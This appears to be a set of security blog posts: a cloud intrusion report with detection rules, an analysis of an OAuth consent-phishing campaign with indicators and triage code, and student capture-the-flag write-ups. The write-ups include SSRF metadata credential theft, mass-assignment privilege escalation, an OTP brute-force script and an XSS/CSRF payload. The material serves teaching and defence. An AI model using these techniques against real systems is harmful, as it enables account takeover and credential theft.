From AWS, the threat actor managed to access an FTP server within a parallel Google Cloud Platform (GCP) environment. For this, they used a hard-coded credential found in one of the configuration files in the victim’s Bitbucket repository, which was also suspected to be compromised. After thorough enumeration of the environment and its users, the attacker obtained the password for another G Suite user account, which they used to access data in the GCP environment and Google Drive.

Shortly after accessing GCP, the threat actors attempted to cover their tracks by deleting the company’s entire production environment, all hosted on AWS, along with its backup copies. Fortunately, AWS retained some copies of the deleted backups, which it was able to provide to the victim organisation.

However, when the victim restored their AWS environment they did not rotate the root access key. Unsurprisingly, the attacker quickly re-established a presence in the cloud environment and a few days later deleted the production environment again, although no ransom demand was recorded. This was when our incident response team was called in to help.

Assessment

Our investigation suggested that the threat actor behind this campaign is likely operating opportunistically and with a relatively low technical know-how. We often found traces of internet searches for open source tools or “how to” techniques. Nonetheless, such an actor could still pose significant operational damage to a large company by deleting their production environment.

The incident shows how even relatively unsophisticated threat actors are adopting an island-hopping approach by abusing imperfect implementations of commercial cloud platforms. Companies should ensure that standard security practices, like rotating passwords or access keys, monitoring suspicious activities, and prompt patching, are also applied to cloud environments.

What’s next?

Our experience suggests that this was not an uncommon attack path for adversaries targeting cloud environments. Monitoring for common attack vectors can help identify suspicious behaviour earlier and contain an incident before it is too late.

Below are some monitoring rules mapped against MITRE ATT&CK tactics that we recommend organisations implement in AWS Config, Lambda, or their CSPM platform of choice for automated detection and remediation.

Feel free to contact us at [threatintel at darklab dot hk] for the full set of 50 custom MITRE-based rules on AWS

Tactic                        | Technique (custom)                                                                        | Log Source
Initial access                | AWS user login failed multiple times                                                      | CloudTrail
Initial access                | Multiple worldwide successful console logins                                              | GuardDuty
Initial access                | Potential web scanning activity: multiple web server 400 errors from the same source IP   | Web access log
Privilege Escalation          | AWS "AssumeRole" from rare external AWS account                                           | CloudTrail
Discovery                     | AWS potential IAM enumeration activities                                                  | CloudTrail
Defense Evasion / Persistence | Create/update managed policy with excessive permissions                                   | CloudTrail
Impact                        | AWS access key enabled                                                                    | CloudTrail
Exfiltration                  | Egress rule added to a security group                                                     | CloudTrail
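As an added example, not part of the original post or DarkLab’s rule set, the following Python implements three of these rules over constructed CloudTrail records: repeated console login failures, RunInstances in a region outside the organisation’s baseline (the anomaly called out in the incident narrative), and AssumeRole from an untrusted external account. The account IDs, baseline regions, IP addresses and user names are constructed, and the helper builds only the CloudTrail fields the rules read (eventName, eventSource, awsRegion, sourceIPAddress, userIdentity, recipientAccountId, requestParameters, responseElements).

```python
from collections import Counter

OUR_ACCOUNT = "111111111111"                         # constructed victim account id
BASELINE_REGIONS = {"ap-southeast-1", "ap-east-1"}   # regions the organisation actually uses
TRUSTED_ACCOUNTS = {OUR_ACCOUNT, "222222222222"}     # accounts allowed to assume our roles
FAILED_LOGIN_THRESHOLD = 5


def event(name, source, region, ip, identity, **extra):
    """Build a minimal CloudTrail record carrying the fields the rules consume."""
    rec = {"eventVersion": "1.08", "eventName": name, "eventSource": source,
           "awsRegion": region, "sourceIPAddress": ip, "userIdentity": identity,
           "recipientAccountId": OUR_ACCOUNT}
    rec.update(extra)
    return rec


def iam_user(name, account=OUR_ACCOUNT):
    return {"type": "IAMUser", "accountId": account, "userName": name}


# Constructed trail: a password-guessing burst, one legitimate login, an out-of-region
# t2.micro launch, a normal launch, and two AssumeRole calls (one external, one internal).
SAMPLE_RECORDS = (
    [event("ConsoleLogin", "signin.amazonaws.com", "us-east-1", "203.0.113.10", iam_user("deploy"),
           responseElements={"ConsoleLogin": "Failure"}) for _ in range(6)]
    + [event("ConsoleLogin", "signin.amazonaws.com", "us-east-1", "198.51.100.7", iam_user("alice"),
             responseElements={"ConsoleLogin": "Success"})]
    + [event("RunInstances", "ec2.amazonaws.com", "us-east-2", "203.0.113.10", iam_user("ops-tmp"),
             requestParameters={"instanceType": "t2.micro"})]
    + [event("RunInstances", "ec2.amazonaws.com", "ap-southeast-1", "198.51.100.7", iam_user("ci"),
             requestParameters={"instanceType": "m5.large"})]
    + [event("AssumeRole", "sts.amazonaws.com", "us-east-1", "203.0.113.10", iam_user("scan", "999999999999"),
             requestParameters={"roleArn": f"arn:aws:iam::{OUR_ACCOUNT}:role/Admin"})]
    + [event("AssumeRole", "sts.amazonaws.com", "ap-east-1", "198.51.100.7", iam_user("ci"),
             requestParameters={"roleArn": f"arn:aws:iam::{OUR_ACCOUNT}:role/Deploy"})]
)


def failed_console_logins(records, threshold=FAILED_LOGIN_THRESHOLD):
    """Rule 1: N or more ConsoleLogin failures from the same (source IP, user)."""
    counts = Counter()
    for r in records:
        if r["eventName"] == "ConsoleLogin" and r.get("responseElements", {}).get("ConsoleLogin") == "Failure":
            counts[(r["sourceIPAddress"], r["userIdentity"].get("userName"))] += 1
    return [{"rule": "multiple_console_login_failures", "source_ip": ip, "user": user, "count": c}
            for (ip, user), c in counts.items() if c >= threshold]


def instances_outside_baseline(records, baseline=BASELINE_REGIONS):
    """Rule 2: EC2 RunInstances in a region the organisation does not normally use."""
    return [{"rule": "run_instances_outside_baseline", "region": r["awsRegion"],
             "user": r["userIdentity"].get("userName"),
             "instance_type": r.get("requestParameters", {}).get("instanceType")}
            for r in records if r["eventName"] == "RunInstances" and r["awsRegion"] not in baseline]


def external_assume_role(records, trusted=TRUSTED_ACCOUNTS):
    """Rule 3: STS AssumeRole where the caller's account is neither ours nor a trusted partner."""
    alerts = []
    for r in records:
        if r["eventName"] != "AssumeRole" or r["eventSource"] != "sts.amazonaws.com":
            continue
        caller = r["userIdentity"].get("accountId")
        if caller and caller != r["recipientAccountId"] and caller not in trusted:
            alerts.append({"rule": "assume_role_from_external_account", "caller_account": caller,
                           "role": r.get("requestParameters", {}).get("roleArn"),
                           "source_ip": r["sourceIPAddress"]})
    return alerts


def run_all(records):
    return failed_console_logins(records) + instances_outside_baseline(records) + external_assume_role(records)


if __name__ == "__main__":
    for alert in run_all(SAMPLE_RECORDS):
        print(alert)
```

The baseline-region rule is deliberately simple: a static set of regions is enough for most organisations and would have fired on the first scanner instance in this incident. Note that it only works if CloudTrail is enabled as a multi-region trail and retained long enough to be queried, which is exactly what was missing here.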

Not Token for Granted

New phishing campaign against financial services steals OAuth tokens to bypass MFA in O365 accounts

DarkLab recently discovered a suspicious email which we identified as part of an active phishing campaign primarily targeting banks and investment companies worldwide, including a number of targets in Hong Kong. The campaign initially seemed aimed at stealing victims’ credentials, a common tactic among threat actors. However, a closer look showed that the threat actors leveraged the OAuth 2.0 authorization framework to obtain permissions on the victim’s O365 account through a rogue Azure application. Because consent is granted inside a session the victim has already authenticated, including any MFA prompt, this would have allowed them to bypass multifactor authentication controls and directly access the victim’s account with the resulting OAuth token, making this a particularly effective social engineering tactic.

Overall, this campaign shows how financially motivated threat actors are evolving their tactics, techniques, and procedures to exploit companies’ increasing reliance on cloud infrastructure.

Phishing email analysis

The email was sent from the domain of a separate entity, likely compromised by the threat actor before the attack against our client. The email metadata also suggests deliberate spoofing of the SMTP sender.

The email contains a fake e-signature verification request, along with a link to “Review and sign”.

The link is crafted to present the user with a request screen (see figure above) to grant permissions to a rogue Azure application. Depending on the threat actors’ intent, the permissions requested can be modified to allow access to cloud-hosted documents and applications, including the email account.

Here is an example of the phishing link:

hxxps://login.windows.net/common/oauth2/authorize?response_type=code&client_id=70ab9cd5-96a5-4dee-b9af-xxxxxxxxxxxx&client_secret=ef17da38-f26c-49d9-9c9c-xxxxxxxxxxxx&redirect_uri=https%3A%2F%2Fkp3jccawgk[.]online&resource=https%3A%2F%2Fkp3jccawgk[.]online&state=xxxxxxxxxxxx#efe1b61bcf8df6b76595xxxxxxxxxxxx

The URL above is an authorization request to the Microsoft identity platform asking for an authorization code, as denoted by the response_type field. The client_id field is the unique ID of an Azure application owned by the threat actor, and the redirect_uri field points to a domain – kp3jccawgk[.]online – staged by the threat actor to capture the redirected HTTP request, which carries the authorization code, once the victim grants the permissions. Note also the client_secret in the URL: in a legitimate flow the application secret is only sent in the back-channel token request, never in a browser-facing authorize link.

To build such an attack infrastructure the threat actor only needs to register a rogue application under an Azure tenant and host a website that captures the redirected requests and their authorization codes. The redirect site also contains JavaScript snippets that record the visiting IP address and details of the victim organisation, very likely for victim profiling and for filtering out visits from security vendors.

Eventually, the victim is redirected to a blank page, now defunct.

The threat actors then use the rogue application to exchange the authorization code for a valid access token. With it, they can access the victim’s O365 account with the permissions granted during the phishing process and perform a variety of actions, from reading account information to sending emails on behalf of the victim.

The attack therefore aims at obtaining OAuth access tokens rather than passwords. A token grants direct access to the victim’s account and removes the need to steal valid user credentials or defeat multi-factor authentication: the victim authenticated to Microsoft (MFA included), and the consent they then gave is what the attacker abuses.
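To show what an analyst should pull out of such a link, here is an added Python triage helper (not part of the original post). It re-parses the phishing URL above (refanged, truncated values kept as printed, fragment dropped) and flags the three traits that give it away. The trusted redirect domain contoso.com and the list of known Microsoft resource hosts are assumptions for the example.

```python
from urllib.parse import urlparse, parse_qs

MS_AUTHORIZE_HOSTS = {"login.windows.net", "login.microsoftonline.com", "login.microsoft.com"}
# Resource hosts a first-party app normally asks for; anything else is worth a look.
KNOWN_MS_RESOURCES = {"graph.microsoft.com", "graph.windows.net", "outlook.office365.com",
                      "outlook.office.com"}
# Domains our own registered applications may redirect to (assumption for the example).
TRUSTED_REDIRECT_DOMAINS = {"contoso.com"}

# The link from the phishing email above, refanged; truncated values kept as printed.
PHISHING_LINK = ("https://login.windows.net/common/oauth2/authorize?response_type=code"
                 "&client_id=70ab9cd5-96a5-4dee-b9af-xxxxxxxxxxxx"
                 "&client_secret=ef17da38-f26c-49d9-9c9c-xxxxxxxxxxxx"
                 "&redirect_uri=https%3A%2F%2Fkp3jccawgk.online"
                 "&resource=https%3A%2F%2Fkp3jccawgk.online&state=xxxxxxxxxxxx")


def _host(url):
    return (urlparse(url).hostname or "").lower()


def _in_domains(url, domains):
    host = _host(url)
    return any(host == d or host.endswith("." + d) for d in domains)


def triage_authorize_url(url, trusted=TRUSTED_REDIRECT_DOMAINS):
    """Parse an OAuth2 authorize URL; return the fields an analyst needs plus red flags."""
    parsed = urlparse(url)
    q = {k: v[0] for k, v in parse_qs(parsed.query).items()}
    result = {
        "ms_authorize_endpoint": _host(url) in MS_AUTHORIZE_HOSTS
                                 and parsed.path.lower().endswith("/oauth2/authorize"),
        "client_id": q.get("client_id"),        # the rogue app, for the tenant-wide hunt
        "redirect_uri": q.get("redirect_uri"),  # where the authorization code is delivered
        "resource": q.get("resource"),
        "red_flags": [],
    }
    flags = result["red_flags"]
    if (q.get("response_type") == "code" and result["redirect_uri"]
            and not _in_domains(result["redirect_uri"], trusted | MS_AUTHORIZE_HOSTS)):
        flags.append("authorization code is sent to an untrusted redirect_uri host: "
                     + _host(result["redirect_uri"]))
    if result["resource"] and not _in_domains(result["resource"], trusted | KNOWN_MS_RESOURCES):
        flags.append("resource is neither a known Microsoft API nor one of our own apps: "
                     + _host(result["resource"]))
    if "client_secret" in q:
        # The secret belongs in the back-channel token request only; its presence here
        # means the attacker's own app credential is hard-coded into the lure.
        flags.append("client_secret embedded in a browser-facing authorize URL")
    result["suspicious"] = bool(flags)
    return result


if __name__ == "__main__":
    for key, value in triage_authorize_url(PHISHING_LINK).items():
        print(f"{key}: {value}")
```

The client_id is the most useful output: it is the value to search for in the tenant's consent audit events and in the list of enterprise applications, since every victim who clicked will have granted consent to that same application.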

Attack infrastructure and insights into the campaign

By pivoting on the redirect domain, we identified multiple threat actor domains, suggesting that they are very likely targeting banks, asset managers, equity firms and, to a lesser degree, law firms and consultancies around the world, including Hong Kong. According to domain registration data, the campaign started at the end of February and is currently active. Based on the nature of its targeting, the campaign appears to be financially motivated.

Detection and remediation

To detect malicious behaviour linked to a user falling victim to a similar phishing email, the most effective way is to monitor the Azure AD audit logs for “Consent to application” events. These record a user’s approval to grant permissions to a third-party application. Microsoft Cloud App Security is also a good place to detect new OAuth applications with high privileges in the tenant.

Sample Microsoft Azure log showing a Consent to Application event for a malicious Azure application

If an internal user falls victim and consent is given to the rogue application, IT teams can revoke the granted permissions under the “Enterprise applications” section of the Azure portal (or delete the application’s service principal from the tenant), reset the user’s credentials and ensure they are protected by MFA. Note that revoking consent does not invalidate access tokens the attacker already holds, so the user’s sessions and refresh tokens should be revoked as well. As a preventive measure, IT teams are also recommended to restrict user consent and enable the Azure AD admin consent workflow, so that administrators gatekeep any grant of access to user data by third-party applications.

Indicators of compromise

  • 188.166.68[.]51
  • kp3jccawgk[.]online
  • 17l78xgnzj[.]online
  • 4zl8t4sqon[.]online
  • 9ybzef6d2h[.]online
  • cprapid[.]com
  • cts1g02r2c[.]online
  • l7p5g1kwh4[.]online
  • num7ewnkn1[.]online
  • rh6757nysb[.]online
  • wbxputufpj[.]online
  • wzoschqdd0[.]online

Hackaday 2020 – Securing the basics [P-3]

Incident Response and Threat Intelligence Challenge

As we mentioned in our previous posts on the Web and Cloud challenges, every year DarkLab organises a capture the flag cybersecurity competition designed for undergraduate students aiming to raise the competency level of future talents to better prepare them for a meaningful career in cybersecurity.

HackaDay 2020 was held on 2 December 2020, and saw the Open University of Hong Kong’s YH team crowned as the winning team, and the Hong Kong University of Science and Technology’s Machine Brickers as runners up.

The theme this year was “Securing the Basics”, based on the experience and real-life challenges that organisations in Hong Kong faced in 2020 – as observed by our own Red Team and Incident Response professionals.

In this series of three blog posts, we want to provide the solution to the different challenges students faced. We hope that this will stimulate even more students to get their hands on the keyboard next year! In this post we cover the Incident Response (IR) and Threat Intelligence (TI) questions.

Ransomware Attack Again 1 (50 pts, 14 solves)

Description: Our client has been hit by a ransomware attack. While the rest of the client’s PCs have been restored, the head of IT insists on decrypting the data to recover an important screenshot of server settings and passwords. They refuse to pay the ransom. The sysadmin left only a snapshot of the infected server.

It seems there is not much left to see. We’re reaching out to you, our best malware analyst, to help research and find a way to decrypt the screenshot.

RDP: hackaday2020-teamX-ransomware.eastasia.cloudapp.azure.com ,  X is your team number

After connecting via RDP to the machine and navigating around the file system, we can see another user named sysadmin. On that user’s desktop, the following are found:

  • Ransomware affected file with extension HKADYYY
  • Ransom note HKADYYY-README, containing a flag

hackaday{y0u_hAve_b33n_R@ns0meD!}

Ransomware Attack Again 2 (100 pts, 7 solves)

Description: Other than the ransom note, what other artefacts could you find?

By navigating the Windows event logs, we notice a suspicious PowerShell command line carrying a large base64 payload (powershell with the -e option).

Decoding the base64 reveals the following two values:

  • Caller script : . $prog -InV 'MTIzNDU2Nzg5MDEyMzQ1Ng=='
  • Second flag

hackaday{wHo$_G0T_my_r@r1Sonn?!}

Ransomware Attack Again 3 (50 pts, 2 solves)

Description: sometimes there is public research on the ransomware behavior which may help you to decrypt the files. Try to surf the net!

A search online will not reveal much, until you check on Twitter, where you will find the following tweet.

The tweet contains the following link : https://0bin.net/paste/xBy4OoNz#0lSty7wpQSy2risE3g6X2Idj4HTNyhy6YaUgeWBmC0-

This 0bin.net post includes a short summary of the ransomware, its decryption routine, and the third flag: hackaday{Blrdi3 w!th th3 g00d n@vvS}

Ransomware Attack Again 4 (300 pts, 0 solves)

Description: You are in the final step, tell me the content of the decrypted file!

According to the decryption routine, successful decryption requires two values:

  1. IV: the base64 string located in the loader, MTIzNDU2Nzg5MDEyMzQ1Ng== (which decodes to the 16 bytes 1234567890123456)
  2. Key seed: a random two-digit number prefixed to the SID of the user that executed the ransomware (sysadmin), i.e. one of

00S-1-5-21-1580626154-3826959220-856111413-500 to 99S-1-5-21-1580626154-3826959220-856111413-500

Only 100 candidate seeds exist, so the seed can be brute forced by running the routine for each value and checking which output is a valid image. The following decryption code uses the IV and the key derived for the winning seed (two-digit prefix 99); the key is the 32-character string 8813d2958f9c8038ec08b29cb1c8830c (the length of an MD5 hex digest), used as the raw 256-bit AES key:

# IV from the loader and the key for the "99" + SID seed, both base64-encoded
$IV  = "MTIzNDU2Nzg5MDEyMzQ1Ng=="
$Key = "ODgxM2QyOTU4ZjljODAzOGVjMDhiMjljYjFjODgzMGM="

# AES-256-CBC with zero padding, as in the published decryption routine
$aesManaged = New-Object "System.Security.Cryptography.AesManaged"
$aesManaged.Mode      = [System.Security.Cryptography.CipherMode]::CBC
$aesManaged.Padding   = [System.Security.Cryptography.PaddingMode]::Zeros
$aesManaged.BlockSize = 128
$aesManaged.KeySize   = 256
$aesManaged.IV  = [System.Convert]::FromBase64String($IV)
$aesManaged.Key = [System.Convert]::FromBase64String($Key)
$decryptor = $aesManaged.CreateDecryptor()

# Decrypt the file in place, then strip the 8-character ".HKADYYY" extension
$fileToDecrypt   = "C:\path\to\encrypted\file.HKADYYY"
$encryptedBytes  = [System.IO.File]::ReadAllBytes($fileToDecrypt)
$unencryptedData = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length)
[System.IO.File]::WriteAllBytes($fileToDecrypt, $unencryptedData)
Rename-Item -Path $fileToDecrypt -NewName ($fileToDecrypt.Substring(0, $fileToDecrypt.Length - 8))
$decryptor.Dispose()
$aesManaged.Dispose()

Running the routine on the encrypted screenshot decrypts it and reveals the final flag:

hackaday{fr33d!fin@l1y~}

That’s it for this blog series; we hope you enjoyed reading and look forward to seeing you at Hackaday 2021!

Hackaday 2020 – Securing the basics [P-2]

Cloud Challenge

Every year, DarkLab organises a Capture the Flag cybersecurity competition designed for undergraduate students aiming to raise the competency level of future talents to better prepare them for a meaningful career in cybersecurity.

HackaDay 2020 was held on 2 December 2020, and saw the Open University of Hong Kong’s YH team crowned as the winning team, and the Hong Kong University of Science and Technology’s Machine Brickers as runners up.

The theme this year was “Securing the Basics”, based on the experience and real-life challenges that organisations in Hong Kong faced in 2020 – as observed by our own Red Team and Incident Response professionals.

In this series of three blog posts, we want to provide the solution to the different challenges students faced. We hope that this will stimulate even more students to get their hands on the keyboard next year!

Make it Rain in the Bucket (50 pts, 14 solves)

Description: Unintended sensitive information disclosure comes in many shapes and forms.  You would be surprised with the information you can find through detailed enumeration and a bit of online research.  Can you unlock the secrets within to take you to the next part of the network? http://www.hackaday.info

P.S. AWS account is not required for this question

This first challenge emulates an unsecured AWS S3 bucket. The website hackaday.info is a static site hosted in an S3 bucket. When hosting a website in S3, the bucket name must match the domain name, so the bucket is necessarily called hackaday.info. Resolving the hostname (for example with ping) gives the following data:

The name resolves to an S3 website endpoint, s3-website.ap-east-1.amazonaws.com. Because the bucket permits public listing, requesting it returns the objects stored in the bucket.

One file should catch your attention: admin_users_only/useraccess.txt, which contains the first flag.

Keys behind the wall (100 pts, 8 solves)

Description: There might be something insecure with this web application, if you could find the keys behind this application, you are one step closer to the image. The flag format is hackadayxxxxxxx

This challenge emulates an SSRF vulnerability in a web application hosted on an AWS EC2 instance.

The SSRF lets an attacker make the instance request its own metadata service at http://169.254.169.254; the credentials of the role attached to the instance are served under /latest/meta-data/iam/security-credentials/<role-name>. This only works because the instance still allows IMDSv1: with IMDSv2 enforced, the service requires a session token obtained with a PUT request, which a GET-only SSRF cannot perform.

As shown below, the AccessKeyId, SecretAccessKey and Token are exposed; an attacker can then impersonate the role attached to the instance using these temporary credentials and conduct additional discovery. The second flag is the role name.

Secret in the Image (200 pts, 1 solves)

Description: The secret lies in the image

This challenge emulates a misconfigured AMI that allows public access. With the temporary credentials obtained in the second challenge, we can impersonate the role from our own machine by placing them in ~/.aws/credentials (the aws_session_token must be included alongside the key ID and secret, otherwise the calls fail).

Once we have the role’s credentials, we enumerate the policies attached to the role to determine its level of privilege.

As shown above, the role has two policies attached. hackadaypolicy is a custom policy created for this role. The next step is to enumerate hackadaypolicy to determine what permissions it grants.

The screenshot above shows all the permissions assigned to the policy. Among them is ec2:DescribeImages; calling it returns an image whose Public attribute is true, together with its AMI ID.

This shows that the AMI created by this role is public, so anyone with an AWS account can launch it.
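As an added example (not the challenge’s own tooling), the following Python evaluates an IAM policy document offline using IAM’s wildcard and Deny-overrides-Allow semantics, lists which interesting actions a role can call, and picks public images out of a DescribeImages response. The policy and the DescribeImages output are constructed samples, not the real hackadaypolicy or the challenge’s AMI.

```python
import fnmatch
import json

# Constructed sample policy (not the real hackadaypolicy), in IAM policy JSON.
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Resource": "*",
         "Action": ["ec2:Describe*", "iam:ListAttachedRolePolicies", "iam:GetPolicy",
                    "iam:GetPolicyVersion"]},
        {"Effect": "Allow", "Action": "s3:GetObject", "Resource": "arn:aws:s3:::hackaday-*/*"},
        {"Effect": "Deny", "Action": "ec2:DescribeInstanceAttribute", "Resource": "*"},
    ],
})

# Constructed DescribeImages response with one image shared with everyone.
SAMPLE_DESCRIBE_IMAGES = {"Images": [
    {"ImageId": "ami-0123456789abcdef0", "Name": "hackaday-base", "Public": True},
    {"ImageId": "ami-0fedcba9876543210", "Name": "internal-only", "Public": False},
]}

# Actions an attacker holding the role would want to know about.
INTERESTING_ACTIONS = ["ec2:DescribeImages", "ec2:DescribeInstanceAttribute",
                       "ec2:ModifyImageAttribute", "iam:ListAttachedRolePolicies",
                       "iam:CreateUser", "s3:GetObject"]


def _as_list(value):
    return [value] if isinstance(value, str) else list(value or [])


def _statements(policy):
    doc = json.loads(policy) if isinstance(policy, str) else policy
    stmts = doc.get("Statement", [])
    return [stmts] if isinstance(stmts, dict) else stmts


def is_allowed(policy, action, resource="*"):
    """Evaluate one identity policy: explicit Deny beats Allow, no match is an implicit deny.
    Action matching is case-insensitive with IAM's '*' and '?' wildcards. Condition blocks
    are ignored, so a True here is an upper bound on what the role can actually do."""
    allowed = False
    for stmt in _statements(policy):
        if "NotAction" in stmt:
            action_match = not any(fnmatch.fnmatchcase(action.lower(), p.lower())
                                   for p in _as_list(stmt["NotAction"]))
        else:
            action_match = any(fnmatch.fnmatchcase(action.lower(), p.lower())
                               for p in _as_list(stmt.get("Action")))
        resource_match = any(fnmatch.fnmatchcase(resource, p)
                             for p in _as_list(stmt.get("Resource")))
        if not (action_match and resource_match):
            continue
        if stmt.get("Effect") == "Deny":
            return False
        allowed = True
    return allowed


def enumerate_permissions(policy, actions=INTERESTING_ACTIONS, resource="*"):
    """Which of the listed actions does the policy allow on the given resource?"""
    return [a for a in actions if is_allowed(policy, a, resource)]


def public_images(describe_images_response):
    """Image IDs marked Public in a DescribeImages response: launchable from any AWS account."""
    return [img["ImageId"] for img in describe_images_response.get("Images", [])
            if img.get("Public")]


if __name__ == "__main__":
    print("allowed:", enumerate_permissions(SAMPLE_POLICY))
    print("public AMIs:", public_images(SAMPLE_DESCRIBE_IMAGES))
```

The real role carries more than one policy, so run the evaluation across every attached policy document (an explicit Deny in any of them wins), and remember that the S3 statement only matches when a concrete object ARN is supplied as the resource, which is why a wildcard resource query under-reports it.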

We can then search for the image under Community AMIs and launch an instance from it.

Once the instance is up, the third flag can be found under the /tmp folder.

That’s it for this challenge, stay tuned for the third and last post which will walk through the Incident Response and Threat Intelligence challenge.

Hackaday 2020 – Securing the basics [P-1]

Web Challenge

Every year, DarkLab organises a Capture the Flag cybersecurity competition designed for undergraduate students aiming to raise the competency level of future talents to better prepare them for a meaningful career in cybersecurity.

HackaDay 2020 was held on 2 December 2020, and saw the Open University of Hong Kong’s YH team crowned as the winning team, and the Hong Kong University of Science and Technology’s Machine Brickers as runners up.

The theme this year was “Securing the Basics”, based on the experience and real-life challenges that organisations in Hong Kong faced in 2020 – as observed by our own Red Team and Incident Response professionals.

In this series of three blog posts, we want to provide the solution to the different challenges students faced. We hope that this will stimulate even more students to get their hands on the keyboard next year!

Web Challenge – With great power comes great responsibility!

Hackaday Chat System 1 (100 pts, 4 solves)

This challenge is meant to exploit the broken access controls of a website. After registering and logging in with an account, you will notice several pre-created accounts (i.e. operator_day1, admin_day1, admin_day2) in the “Select User” drop-down list. The account operator_day1 is our target for this challenge.

The key element is the user UUID in the profile page URL. UUIDs in this system are simply the MD5 hash of the user’s email address, so with an MD5 generator we can compute operator_day1’s UUID and open the profile page directly at /profile.php?uuid=14a7a7da8dfcba61a4af2b695a553cf0.

Inside operator_day1’s profile page we can retrieve the SHA-256 hash of the user’s password. Using an online hash cracking site, we recover the plaintext password of the operator account.

After logging in with the operator account, the flag will be displayed at the chat box.

Hackaday Chat System 2 (150 pts, 1 solve)

This challenge is an extension of the Chat System 1. This time, the account admin_day1 will be our target.

In the operator_day1’s profile, a new endpoint – updateUser.php – is available to update username or password. However, after clicking the button, an error message is prompted saying the naming function is in maintenance.

Using a web proxy tool, we can edit the form data of the request to remove the name-changing parameter. As the endpoint is also vulnerable to parameter injection (mass assignment), adding a new field “role” lets us set the role of the user.

Here we crafted a request to change the role of operator_day1 to administrator, which is same as the role of admin_day1.

With administrator privileges, we can now change the password of admin_day1 to another one of our choice. (Note that UUID in the request is the one from the admin_day1 account)

After logging in to the system with admin_day1 account, we can retrieve the flag in the chat box.

OTP Member Portal (150 pts, 0 solves)

Description: Multi-factor authentication (MFA) is an electronic authentication method in which a user is granted access to a website or application only after successfully presenting two or more pieces of evidence (or factors) to an authentication mechanism: knowledge (something only the user knows), possession (something only the user has), and inherence (something only the user is) – SUPER SAFE!

This challenge aims to bypass the password login step and brute force a weak MFA implementation.

Once you register an account in the system and complete a normal login process, you can notice that:

  1. You would need an account from Hackaday Chat System in order to receive OTP
  2. The OTP is 3-digit code from 100-999
  3. Account will be locked after 5 incorrect OTP login attempts
  4. You can send request to reset the fail counts and the OTP
  5. The target account of this challenge is admin_day2@hackaday.com
  6. Exploiting the target account in Hackaday Chat System would not work since admins will not receive OTP from chat system
  7. The normal login process is represented in the below graph

The weakness is in the password login step. Due to broken access control, after the “password incorrect” message is shown we can still access the OTP login page directly, with the target account information already embedded in the PHP session.

You could therefore write a script to exploit the system by bruteforcing the OTP system:

  1. Login on the account admin_day2@hackaday.com with random password
  2. After seeing the “password incorrect” message, directly access /OTPlogin.php
  3. Brute force the OTP at most 4 times (staying below the 5-attempt lockout)
  4. Submit request to resend OTP if all attempts failed
  5. Repeat step 3 and 4 until the OTP login is successful
  6. Access member.php with the same PHP session

A sample program written in Go (otp-sample.go) is provided for reference.

After finishing the above steps, the flag will be displayed at profile.php.
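The loop below is an added Python example of the procedure, not the otp-sample.go program referred to above. It drives the attack through a small client interface; SimulatedPortal is a constructed stand-in that models the behaviour listed above (3-digit OTP, lockout after 5 failed attempts, counter and OTP reset on resend) so the logic can be exercised offline. Against the real target, login, otp_login and resend_otp would be HTTP requests carrying the same PHPSESSID cookie; /OTPlogin.php is from the challenge, the other endpoint names are not known here.

```python
import random

TARGET = "admin_day2@hackaday.com"
OTP_RANGE = range(100, 1000)   # 3-digit codes, 900 possibilities
GUESSES_PER_OTP = 4            # one below the 5-failure lockout


class SimulatedPortal:
    """Constructed stand-in for the vulnerable portal, modelling the observed behaviour."""

    def __init__(self, seed=0):
        self._rng = random.Random(seed)
        self.session = {}
        self._otp = None
        self._failures = 0
        self.locked = False

    def login(self, email, password):
        # Broken access control: the target account lands in the PHP session and an OTP
        # is issued even though the password check fails.
        self.session["pending_user"] = email
        self._issue_otp()
        return False  # "password incorrect"

    def otp_login(self, code):
        # Equivalent of POSTing a code to /OTPlogin.php with the same session cookie.
        if self.locked or "pending_user" not in self.session:
            return False
        if code == self._otp:
            self.session["user"] = self.session.pop("pending_user")
            return True
        self._failures += 1
        if self._failures >= 5:
            self.locked = True
        return False

    def resend_otp(self):
        # The reset request clears the failure counter and issues a fresh OTP.
        self._issue_otp()

    def _issue_otp(self):
        self._otp = self._rng.choice(OTP_RANGE)
        self._failures = 0


def brute_force_otp(portal, email=TARGET, max_rounds=10000, guess_seed=1):
    """Steps 1-6 above: fail the password login, then guess 4 codes per OTP, resend, repeat."""
    guesses = random.Random(guess_seed)
    portal.login(email, "not-the-password")          # step 1: any wrong password
    for round_no in range(1, max_rounds + 1):
        # steps 2-3: go straight to the OTP step and try GUESSES_PER_OTP distinct codes
        for code in guesses.sample(OTP_RANGE, GUESSES_PER_OTP):
            if portal.otp_login(code):
                return {"success": True, "rounds": round_no, "code": code}
        portal.resend_otp()                          # step 4: reset counter and OTP
    return {"success": False, "rounds": max_rounds, "code": None}


if __name__ == "__main__":
    print(brute_force_otp(SimulatedPortal(seed=3)))
```

Because every resend draws a fresh OTP, the order of guesses does not matter: each round succeeds with probability 4/900, so the attack needs about 225 rounds (900 requests) on average, which is why a 3-digit code plus a resettable counter is no real second factor.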

OTP Admin Portal (100 pts, 0 solves)

This challenge aims to exploit the file upload feature of the system. We are allowed to upload any file, the only limitation being on file size. After uploading a .htaccess file that enables directory listing (Options +Indexes), we can browse the upload directory and find the flag at the link provided.

Simple Message Board (250 pts, 3 solves)

Description: I found a message board online and it seems there is a secret hidden there which can only be accessed by the admin. Do you know how to get the secret?

This challenge is aimed at exploiting the message board system with Cross-site scripting (XSS) and/ or Cross-Site Request Forgery (CSRF).

In the message board system, we are given three functions: one for posting a message to the board, one for clearing the log, and one for getting the flag.

It is observed that:

  1. Someone (likely the admin) is frequently accessing the board and clearing logs
  2. Both name and message fields are vulnerable to XSS
  3. There is a hidden field (csrf_token) in the “Get Flag” form
  4. There is a PHP session ID and a field named “Admin” in the cookie; changing the value of the “Admin” field does not work either

The target of this challenge is to force admin to somehow click the “Get Flag” function or steal the session (cookies) from the admin.

Solution 1

To solve the challenge, we could write a script to force admin to access the “Get Flag” function:

<script>
// Wait a moment so the "Get Flag" form, and its csrf_token input, has been parsed
setTimeout(function () {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "getflag.php");
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    // Read the admin's own CSRF token from the page and submit it under the admin's session
    xhr.send("csrf_token=" + document.querySelector("input[name=csrf_token]").value);
}, 1);
</script>

The script will do the following procedures:

  1. Query the value of csrf_token in the page
  2. Send a form request to getflag.php to trigger the function

